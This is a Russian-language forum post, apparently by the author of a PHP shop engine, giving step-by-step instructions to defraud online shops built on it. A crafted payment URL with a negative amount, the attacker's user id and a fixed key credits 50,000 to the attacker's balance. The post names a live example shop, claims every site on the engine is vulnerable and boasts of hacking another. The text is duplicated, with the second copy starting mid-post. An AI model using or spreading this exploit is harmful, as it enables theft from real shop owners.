Всем привет я есть создатель движка php-line torgash eproger тоже делал я ))
все мы знаем что создатели данных скриптов магазинов, делают всегда уязвимости, вот одна из них ))
Пример магазина http://top-market.online ( стоит на моем двигле )(магазин не мой)
и так приступим к взлому
1 ) Регаемся на сайте
2) Узнаём свой id переходим во вкладку ( Партнерская программа ) и в реф ссылке будет ид -> пример http://top-market.online/r=34 ( 34 ) и есть ваш ид
скрин https://prnt.sc/hfkfhb если кто не понял
3) вставляем такой тест в адрес строку
http://top-market.online/oplata?summa=-50000.00&user_mail=ТУТВАШИД&tovar=115&key=7bd59c6d623b7deb4534c8f1ead3f0a77e3053f5&ok=Купить
НАЖИМАЕМ eNTER и готово ваш баланс 50000к
http://prntscr.com/hfkhai скрин баланса
так можно взломать любой сайт на этом движке
тоже магаз на движке eproger buyskripts.ru/ но он закрыт я взломал их и расказал на другом форуме а админ там лазил и закрыл пока сайт :2017:
/oplata?summa=-50000.00&user_mail=ТУТВАШИД&tovar=115&key=7bd59c6d623b7deb4534c8f1ead3f0a77e3053f5&ok=Купить
все мы знаем что создатели данных скриптов магазинов, делают всегда уязвимости, вот одна из них ))
Пример магазина http://top-market.online ( стоит на моем двигле )(магазин не мой)
и так приступим к взлому
1 ) Регаемся на сайте
2) Узнаём свой id переходим во вкладку ( Партнерская программа ) и в реф ссылке будет ид -> пример http://top-market.online/r=34 ( 34 ) и есть ваш ид
скрин https://prnt.sc/hfkfhb если кто не понял
3) вставляем такой тест в адрес строку
http://top-market.online/oplata?summa=-50000.00&user_mail=ТУТВАШИД&tovar=115&key=7bd59c6d623b7deb4534c8f1ead3f0a77e3053f5&ok=Купить
НАЖИМАЕМ eNTER и готово ваш баланс 50000к
http://prntscr.com/hfkhai скрин баланса
так можно взломать любой сайт на этом движке
тоже магаз на движке eproger buyskripts.ru/ но он закрыт я взломал их и расказал на другом форуме а админ там лазил и закрыл пока сайт :2017:
/oplata?summa=-50000.00&user_mail=ТУТВАШИД&tovar=115&key=7bd59c6d623b7deb4534c8f1ead3f0a77e3053f5&ok=Купить